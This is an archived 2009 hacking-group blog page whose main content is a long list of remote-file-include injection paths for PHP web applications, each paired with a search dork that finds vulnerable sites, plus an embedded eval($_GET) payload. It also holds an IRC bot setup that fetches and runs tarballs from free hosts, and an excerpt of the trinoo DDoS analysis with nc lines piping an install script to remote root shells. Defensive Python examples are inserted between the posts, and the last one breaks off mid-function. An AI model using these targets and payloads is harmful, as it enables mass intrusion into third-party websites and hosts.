Thursday, 16 July 2009

bug dork

revoTeaM Site
Nothing Perfect Humans in The Worlds


bug dorks for scanner

* 09/04/2009 – 6:31 pm
* Posted in tips and tricks

Exploit bug dorks for scanners. Each entry is a vulnerable script path with its injectable parameter left empty, followed by the search-engine dork used to find installations running it.

docs/front-end-demo/cart2.php?workdir= "inurl%3A%22aLogIn.php%22"
docs/front-end-demo/cart2.php?workdir= inurl:hosting.php?spt=
/bemarket/postscript/postscript.php?p_mode= /bemarket/
index.php?mode= inurl:”*.php?mode=join” friend
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root= inurl:/modules/icontent
modules/coppermine/themes/default/theme.php?THEME_DIR= Powered By Coppermine Photo Gallery v1.2.2b
/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan modify.php?dir_module= allinurl%3Axfsection+site%3Ajp
/modules/userstop/userstop.php?exbb[home_path]= Powered by ExBB
index.php?page= allinurl%3Aindex.php%3Fpagedb%3D
contenido/external/frontend/news.php?cfg[path][includes]= cms/front_content.php?idcat=
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo” site:gov
includes/include_once.php?include_file= allinurl%3A%2Fproduct_info.php%3Fcust_id%3D”
mygallerybrowser.php?myPath= inurl:%22/mygallery/myfunctions/%22
admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir= “LimeSurvey”
admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/Root.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/File.php?homedir= “LimeSurvey”
phpbb/sendmsg.php?phpbb_root_path= “Flashbb”
PPPoE/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
library/authorize.php?login_form= “PhpHostBot”
historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
index.php?page= inurl:index.php%”Submit%Articles”%”Member%Login”%”Top%Authors”
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= "Nuke ET Copyright © 2004 por Truzone."
modules/admin/vw_usr_roles.php?baseDir= “dotProject logo”
modules/Forums/admin/admin_users.php?phpbb_root_path= %22modules.php%3Fname%3DForums%22
@scan 1000 includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]= "Powered+by+CubeCart+3.0.0"
eva/imprim.php3?aide= “Eva-Web”
index.php?s= index.php?s=
!scan index.php?a= index.php?a=
/xcart/config.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=cart
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=pages
/ws/get_events.php?includedir= WebCalendar
agenda2.php3?rootagenda= phpmyagenda
modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= inurl:”vwar”
/templates/tmpl_dfl/scripts/index.php?dir[inc]= “Powered by : Dolphin Web Community Software”
admin/business_inc/saveserver.php?thisdir= Confixx Professional
protection.php?action=logout&siteurl= PHPFanBase
modify.php?dir_module= allinurl%3Axfsection
classes/phpmailer/class.cs_phpmailer.php?classes_dir= inurl:cs-cart
!scan wp-pass.php?_wp_http_referer= “powered by wordpress”
.scan index.php?abs_path= index.php?action=viewcart
/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
index.php?func= “Powered by FlashGameScript”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]= inurl:”sohoadmin”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= inurl:”index.php?pr=Services”
/include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site= “Punktesystem Pro”
ws/login.php?noSet=0&includedir= “WebCalendar”
!scan login.php?svr_rootscript= allinurl:order?page=plan_show
modules/MDForum/includes/functions_admin.php?phpbb_root_path= “powered by MDForum”
/newsboard//admin/addons/archive/archive.php?adminfolder= “/newsboard/”
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= “/vwar/”
language/lang_german/lang_main_album.php?phpbb_root_path= phpbbplus
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “.uk/index.php”+”option”
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:br
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:il
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= com_frontpage site:my
eva/index.php3?aide= “Eva-Web”
/vwar/convert/mvcw.php?step=1&vwar_root= vwar
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= "HTML_TreeMenuXL"
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenu”
/photo_comment.php?toroot= "Exhibit Engine 1.5 RC 4"
protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
/accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “powered by boonex”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “netcat require”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “powered by CMS Made Simple version”
includes/include_once.php?include_file= create_account.php?PHPSESSID=
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= “Powered By Zen Cart”
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= Copyright © 2003-2006 Zen Cart
/inc/header.php/step_one.php?server_inc= step_one.php?sid
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_joomap
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_jpgraph
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_letterman
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_swmenufree
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_bsq_sitestats
components/com_livechat/livechat.html.php?mosConfig_absolute_path= com_livechat
components/com_mypms/class.mypms.php?mosConfig_absolute_path= com_mypms
/admin/classes/TplLoad.php?full_path_to_public_program= /TplLoad.php/
/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act= /kboard.php?board=
/index.php?abg_path= Africa Be Gone
errors.php?error= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact=
/LightTwoOh/sidebar.php?loadpage= phpAutoVide

/com_joomnik/admin.joomnik.html.php?mosConfig_absolute_path= com_joomnik
/com_joomlaflashfun/admin.joomlaflashfun.php?= com_joomlaflashfun
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= com_admin
/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop
/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= com_lurm_constructor
!scan tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4
!scan modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= xoopsgallery
!scan /config.inc.php?path_escape= XZero Community Classified
!scan /php121adminconfig.php?mosConfig_absolute_path= PHP121
!scan /common/db.php?commonpath= “samPHPweb”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_rss

path/bridge/yabbse.inc.php?sourcedir= Coppermine Photo Gallery
!scan /lib/functions.php?DOC_ROOT= intitle:”OFFL – Login”
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= “/index.php?option=com_joomlaradiov5″

calogic/clmcpreload.php?CLPATH= calogic
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= modules.php?name=
modifyform.html?code= modifyform.html?*=*
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_frontpage
# com_jce # NEW BUG SECURITY PHP 9/15/07 10:05 pm
# com_jim # NEW BUG SECURITY PHP 9/15/07 9:12 pm
# com_jreactions # NEW BUG SECURITY PHP 9/15/07 8:56 pm
# com_neoreferences # NEW BUG SECURITY PHP 9/15/07 8:
# com_quran # NEW BUG SECURITY PHP 9/15/07 7:49 pm
# com_datsogallery # NEW BUG SECURITY PHP 9/15/07 7:47 pm
# com_ricettario # NEW BUG SECURITY PHP 9/15/07 7:38 pm
# com_ab_calendar # NEW BUG SECURITY PHP 9/15/07 7:14 p
# com_joomlalib # NEW BUG SECURITY PHP 9/15/07 6:27 pm

/language/lang_german/lang_main_album.php?phpbb_root_path=
“Powered by phpBB2 Plus”
!scan administrator/components/com_jreactions/langset.php?comPath= Joomla J! Reactions
!scan language/lang_english/lang_main_album.php?phpbb_root_path= phpbb inurl:album.php site:uk
!scan /rconfig.inc.php?config[root_dir]= amember Pro / amember
Solo @rfi /language/lang_english/lang_main_album.php?phpbb_root_path= “Powered by phpBB2 Plus”
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_frontpage
components/com_datsogallery/datsogallery.php?mosConfig_absolute_path= com_frontpage
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_frontpage
mcconfig.php?CLPATH= calogic Philip Boone
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_sobi2
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_acajoom
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= “.tr./components” “.tr./components”
components/com_contxtd/contxtd.class.php?mosConfig_absolute_path= com_contxtd
administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path= components/com_blastchatc/blastchatc.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=
administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path= com_uddeim

components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= com_rwcards
administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path= com_rwcards
mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT= “Powered by SocketMail”
modules/Forums/favorites.php?nuke_bb_root_path= Powered by Platinum 7.6.b.5
!scan administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path= com_chronocontact
includes/include_once.php?include_file= Click to View Our Catalog
rconfig.inc.php?config[root_dir]= aMember PRO
index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
/components/com_joomlalib/standalone/stubjambo.php?baseDir= com_performs
!scan /_theme/breadcrumb.php?rootBase= “!new Female Celebrities”
urlinn_includes/config.php?dir_ws= put a copy/past from URL
/_inc/config.php?rootBase= “! Hide Your Friends & Comments”
!scan includes/functions_admin.php?phpbb_root_path= pNphpBB2
tiny_includes/config.php?dir_ws= put a copy/past from URL
/_theme/_siteColors.php?rootBase= ‘page generated in’ time?
!alls index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
!alls index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path= com_joomlaxplorer
com_neolegal | com_dfcontact | com_massmail | com_syndicate |com_categories |com_newsfeeds | com_banners |
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= 2004 Miro International Pty Ltd.
administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path= com_chronocontact
=============================
administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=
administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.php?mosConfig_absolute_path=
administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=
components/com_utchat/utchat.php?mosConfig_absolute_path=
components/com_google_maps/google_maps.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= com_peoplebook
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= webshop
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= CubeCart
/tools/send_reminders.php?includedir= day.php?date=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage
config/config_admin.php?INC= “Your Search Starts Here”
config_member.php?INC= “Your Search Starts Here”
config/config_member.php?INC= “Your Search Starts Here”
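The whole list follows one pattern: a PHP script with the parameter that gets fed a remote URL left empty, then the search-engine query that locates installations (some entries carry scanner-bot prefixes such as !scan or @scan 1000). The Python below is an added example, not code from this post: it parses entries in that format into (prefix, path, injectable parameter, dork) records and then uses them to flag remote-file-include attempts in web server access logs, which is the defensive use of the same list. The access-log lines and attacker addresses are constructed for the demonstration, and treating the target as the first whitespace-separated token that ends in "=" is my assumption about the format.

```python
"""Parse RFI "bug dork" entries and use them to spot remote-include
attempts in access logs.  Added example, not code from the original post.
The access-log lines below are constructed; 203.0.113.x / 198.51.100.x are
documentation addresses."""
import re
from urllib.parse import parse_qsl, unquote

# Entries copied from the list above (one per style: !scan, @scan N, bare).
DORK_LINES = """\
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= "Nuke ET Copyright © 2004 por Truzone."
@scan 1000 includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]= "Powered+by+CubeCart+3.0.0"
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" site:br
/xcart/config.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
"""

# A remote include needs a URL-like value: http/ftp, or a PHP stream wrapper.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftp|php|data|expect)://|^\s*data:", re.I)

# Combined log format: only the request line is needed here.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def parse_dork(line):
    """Split one entry into scanner prefix, target path, fixed parameters,
    the injectable (empty-valued) parameter and the search dork.
    Returns None for lines that carry no '?...=' target."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if "?" in tok and tok.endswith("="):
            path, _, query = tok.partition("?")
            pairs = parse_qsl(query, keep_blank_values=True)
            empties = [k for k, v in pairs if v == ""]
            if not empties:
                return None
            return {
                "prefix": " ".join(tokens[:i]),
                "path": path.lstrip("/"),
                "fixed_params": {k: v for k, v in pairs if v != ""},
                "inject_param": empties[-1],   # last empty key is the injection point
                "dork": " ".join(tokens[i + 1:]),
            }
    return None


def parse_dork_list(text):
    return [d for d in map(parse_dork, text.splitlines()) if d]


def find_rfi_attempts(log_lines, dorks):
    """Return (client, request_path, param, value) for requests that hit a
    known vulnerable path with a URL-like value in its injectable parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        req_path, _, query = m.group("target").partition("?")
        req_path = req_path.lstrip("/")
        params = dict(parse_qsl(query, keep_blank_values=True))
        for d in dorks:
            value = params.get(d["inject_param"])
            if (req_path.endswith(d["path"]) and value is not None
                    and REMOTE_VALUE.match(unquote(value))):
                hits.append((client, req_path, d["inject_param"], value))
    return hits


DORKS = parse_dork_list(DORK_LINES)

LOG_LINES = [  # constructed access-log lines
    '203.0.113.9 - - [16/Jul/2009:10:02:11 +0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.0.113.77/shell.txt? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [16/Jul/2009:10:02:12 +0700] "GET /shop/xcart/config.php?xcart_dir=ftp%3A%2F%2F203.0.113.77%2Fshell.txt%00 HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [16/Jul/2009:10:03:40 +0700] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [16/Jul/2009:10:04:01 +0700] "GET /xcart/config.php?xcart_dir=/var/www/xcart HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(LOG_LINES, DORKS):
        print("RFI attempt:", hit)
```

The match is deliberately narrow (known path suffix plus a URL-valued injectable parameter), so the fourth log line, a local path in xcart_dir, is not reported; widen REMOTE_VALUE if you also want to catch local-file-include probes.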
Setting up an eggdrop bot

* 03/04/2009 – 7:33 pm
* Posted in Tutorials

Steps to set up an Eggdrop bot:

First decide which network the bot should be loaded on; two servers can be used here, Irc.Allnetwork.Org and Irc.Byroe.Net. Then get a shell ready, enter all of the commands below into it, and wait for the bot to join your channel. Good luck.

### Irc.Allnetwork.Org ###

1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/jongke_city/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (bot-nick) (bot-ident) (shell-ip) (channel) (owner)
example for step 7: ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada

8. cd scripts
9. wget geocities.com/jongke_city/sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]

### Irc.Byroe.Net ###

1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/script_help/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (bot-nick) (bot-ident) (shell-ip) (channel) (owner)
example for step 7: ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada

8. cd scripts
9. wget geocities.com/script_help/sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]

Thanks to ROZI, my owner
INSTALLING AN IRCD

* 01/04/2009 – 8:08 pm
* Posted in Tutorials

You have surely heard of IRCd, the daemon behind IRC servers and networks. For someone installing an ircd for the first time it can be confusing, and the last steps often fail. This post walks through the installation and how to deal with the problems. Let's go, guys... :)

First, get a shell on either Linux or FreeBSD; the only difference is in the commands used. Many of you already know this, right? :P

Next, open the shell and create a directory to hold the ircd files, but first check which directory we are in:

pwd

/home/estrada

mkdir solo

nb: solo <= example name for the new directory where we keep the files.

Then change into the new directory and run the following:

1. cd solo

2. wget http://bdd.exolia.net/serveurs/Unreal3.2.7.tar.gz
3. tar -zxvf Unreal3.2.7.tar.gz
4. cd Unreal3.2.7
5. ./Config

If it prompts you with -[ Enter ]-, keep pressing Enter until it reaches 100%.

6. make

After make, edit the configuration in unrealircd.conf, connect.conf, oper.conf and ircd.motd. On Linux use "vi"; on FreeBSD you can use "pico", depending on which one is available. To save an edited file in vi press Esc, type :wq and press Enter.

vi unrealircd.conf
vi connect.conf
vi oper.conf
vi ircd.motd

Once all the configuration files have been edited, run:
7. make install
8. ./unreal start

That's it, you now have your own server. :P

That's all for now; questions, suggestions and criticism are welcome. :)

NB: For example unrealircd.conf, connect.conf and oper.conf files, see the IRCD category.
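Both of the tutorials above (the eggdrop bot and this UnrealIRCd install) follow the same pattern: fetch a tarball over plain HTTP from a site you do not control, unpack it, and run whatever came out. The Python below is an added example and is not part of either tutorial. It pins a downloaded archive to a SHA-256 hash obtained out of band and refuses archives whose entries would land outside the target directory (absolute names, ".." components, symlinks, hardlinks or device nodes) before anything is written to disk. The archive contents, file names and hash are constructed in memory so that the example runs offline; in real use you would read the downloaded file and compare against the publisher's hash.

```python
"""Verify a downloaded archive before unpacking it.

Added example, not code from the original page or from eggdrop/UnrealIRCd.
The archives, file names and hash below are constructed for the demo."""
import hashlib
import io
import os
import tarfile
import tempfile


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def safe_members(tar: tarfile.TarFile, dest: str):
    """Yield only regular files and directories that resolve inside dest.
    Absolute names, '..' components, links and device nodes are rejected."""
    dest_real = os.path.realpath(dest)
    for m in tar.getmembers():
        if not (m.isreg() or m.isdir()):
            raise ValueError(f"refusing special member: {m.name!r}")
        if os.path.isabs(m.name) or ".." in m.name.split("/"):
            raise ValueError(f"refusing path traversal: {m.name!r}")
        target = os.path.realpath(os.path.join(dest_real, m.name))
        if os.path.commonpath([dest_real, target]) != dest_real:
            raise ValueError(f"member escapes destination: {m.name!r}")
        yield m


def verify_and_extract(archive: bytes, expected_sha256: str, dest: str):
    """Check the archive hash, vet every member, then extract.
    Returns the extracted member names in archive order."""
    actual = sha256_hex(archive)
    if actual != expected_sha256.lower():
        raise ValueError(f"hash mismatch: got {actual}, expected {expected_sha256}")
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        members = list(safe_members(tar, dest))        # validate all before writing any
        # Newer Pythons also offer the 'data' filter; use it when present.
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, members=members, **extra)
    return [m.name for m in members]


def build_tar_gz(entries: dict) -> bytes:
    """Constructed test archive: {name: content} -> gzip'd tar bytes.
    Names are stored verbatim, so traversal names can be produced."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in entries.items():
            info = tarfile.TarInfo(name=name)
            data = content.encode()
            info.size = len(data)
            info.mode = 0o755 if name.endswith("run") else 0o644
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed stand-ins for the tarballs the tutorials fetch.
GOOD = build_tar_gz({
    "mbonx/run": "#!/bin/sh\necho constructed placeholder\n",
    "mbonx/scripts/ary.tcl": "# constructed placeholder script\n",
})
EVIL = build_tar_gz({
    "mbonx/run": "#!/bin/sh\n",
    "../../etc/cron.d/bot": "* * * * * root /var/tmp/mbonx/run\n",
})
# In real use this value comes from the publisher, out of band, never from
# the same download.  Here it is computed so the demo is self-contained.
GOOD_SHA256 = sha256_hex(GOOD)


def run_demo() -> dict:
    out = {}
    with tempfile.TemporaryDirectory() as d:
        out["good"] = verify_and_extract(GOOD, GOOD_SHA256, d)
        out["files_present"] = os.path.isfile(os.path.join(d, "mbonx", "scripts", "ary.tcl"))
    try:
        with tempfile.TemporaryDirectory() as d:
            verify_and_extract(GOOD, "00" * 32, d)
        out["bad_hash_rejected"] = False
    except ValueError:
        out["bad_hash_rejected"] = True
    try:
        with tempfile.TemporaryDirectory() as d:
            verify_and_extract(EVIL, sha256_hex(EVIL), d)
        out["traversal_rejected"] = False
    except ValueError:
        out["traversal_rejected"] = True
    return out


if __name__ == "__main__":
    print(run_demo())
```

The hash check only helps if the expected value did not travel over the same unauthenticated channel as the tarball; a checksum file sitting next to the download on the same free-hosting account proves nothing.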

Thanks and regards to:

Dj-RuFfy – NOGGLENK – ROZI And Sekip Crew – Cavalera And Habbat Crew.

Irc.Mildnet.Org Crew

Irc.Allindo.Net Crew

Irc.Indoirc.Net Crew

Irc.Byroe.Net Crew
trinoo.analysis

* 01/04/2009 – 6:59 pm
* Posted in hacking

==========================================================================

The DoS Project's "trinoo" distributed denial of service attack tool

==========================================================================

David Dittrich
University of Washington
Copyright 1999. All rights reserved.
October 21, 1999

Introduction
------------

The following is an analysis of the DoS Project's "trinoo" (a.k.a.
"trin00") master/slave programs, which implement a distributed
network denial of service tool.

Trinoo daemons were originally found in binary form on a number of
Solaris 2.x systems, which were identified as having been compromised
by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". These attacks are described in CERT
Incident Note 99-04:

http://www.cert.org/incident_notes/IN-99-04.html

The trinoo daemons were originally believed to be UDP based,
access-restricted remote command shells, possibly used in conjunction
with sniffers to automate recovering sniffer logs.

During investigation of these intrusions, the installation of a trinoo
network was caught in the act and the trinoo source code was obtained
from the account used to cache the intruders' tools and log files.
This analysis was done using this recovered source code.

Modification of the source code would change any of the details
in this analysis, such as prompts, passwords, commands, TCP/UDP port
numbers, or supported attack methods, signatures, and features.

The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0
systems. The master was compiled and run on Red Hat Linux 6.0. It is
believed that both master and daemon have been witnessed "in the
wild" on these same platforms.

Trinoo networks are probably being set up on hundreds, perhaps
thousands, of systems on the Internet that are being compromised by
remote buffer overrun exploitation. Access to these systems is
probably being perpetuated by the installation of multiple "back
doors" along with the trinoo daemons.

A trinoo network of at least 227 systems -- 114 of these at Internet2
sites -- was used on August 17, 1999 to flood a single system at the
University of Minnesota, swamping the target network and rendering it
unusable for over two days. While responding to this attack, large
flows were also noticed going to at least sixteen other systems, some
outside the US. (See Appendix D for a report of part of this trinoo
attack.)

Attack scenario
---------------

A typical installation might go something like this.

1). A stolen account is set up as a repository for pre-compiled
versions of scanning tools, attack (i.e. buffer overrun exploit)
tools, root kits and sniffers, trinoo daemon and master programs,
lists of vulnerable hosts and previously compromised hosts, etc. This
would normally be a large system with many users, one with little
administrative oversight, and on a high-bandwidth connection for rapid
file transfer.

2). A scan is performed of large ranges of network blocks to identify
potential targets. Targets would include systems running various
services known to have remotely exploitable buffer overflow security
bugs, such as wu-ftpd, RPC services for "cmsd", "statd",
"ttdbserverd", "amd", etc. Operating systems being targeted appear to
be primarily Sun Solaris 2.x and Linux (due to the ready availability
of network sniffers and "root kits" for concealing back doors, etc.),
but stolen accounts on any architecture can be used for caching tools
and log files.

3). A list of vulnerable systems is then used to create a script that
performs the exploit, sets up a command shell running under the root
account that listens on a TCP port (commonly 1524/tcp, the
"ingreslock" service port), and connects to this port to confirm the
success of the exploit. In some cases, an electronic mail message is
sent to an account at a free web based email service to confirm which
systems have been compromised.

The result is a list of "owned" systems ready for setting up
back doors, sniffers, or the trinoo daemons or masters.

4). From this list of compromised systems, subsets with the desired
architecture are chosen for the trinoo network. Pre-compiled binaries
of the trinoo daemon are created and stored on a stolen account
somewhere on the Internet.

5). A script is then run which takes this list of "owned" systems and
produces yet another script to automate the installation process,
running each installation in the background for maximum multitasking.

This script uses "netcat" ("nc") to pipe a shell script to the root
shell listening on, in this case, port 1524/tcp:

---------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
. . .
---------------------------------------------------------------------------

The script "trin.sh", whose output is being piped to these systems,
looks like:

---------------------------------------------------------------------------
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"

echo "chmod +x /usr/sbin/rpc.listen"

echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"

echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
---------------------------------------------------------------------------

Depending on how closely crontab files are monitored, or if they are
used at all, this may be detected easily. If cron is not used at all
by this user (usually root), it may not be detected at all.

Another method was witnessed on at least one other system, where the
daemon was named "xterm", and was started using a script (named "c" on
the system on which it was found) that contains:

---------------------------------------------------------------------------
cd /var/adm/.1
PATH=.:$PATH
export PATH
xterm 1>/dev/null 2>&1
---------------------------------------------------------------------------

This would supposedly imply a method of running this script on demand
to set up the trinoo network.
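Both start-up methods above leave a host-side trace: the first adds an every-minute entry to root's crontab, the second runs a binary out of a hidden directory under /var/adm. As an added example that is not part of the original analysis, the Python below diffs a collected root crontab against a recorded baseline, which is the check the paragraph on crontab monitoring calls for, and states why each new entry looks suspicious. The baseline and collected crontabs are constructed; the @reboot entry that launches the "c" script is my assumption about how the second method might be scheduled, since the text leaves that open.

```python
"""Diff a root crontab against a baseline and explain new entries.
Added example, not part of the original analysis.  Both crontabs below
are constructed; the @reboot entry for the 'c' script is an assumed way
the second method might be scheduled."""
import re

CRON_FIELDS = 5
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
VAR_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_entry(line):
    """Return (schedule, command) for a job line; None for blanks,
    comments and VAR=value settings."""
    s = line.strip()
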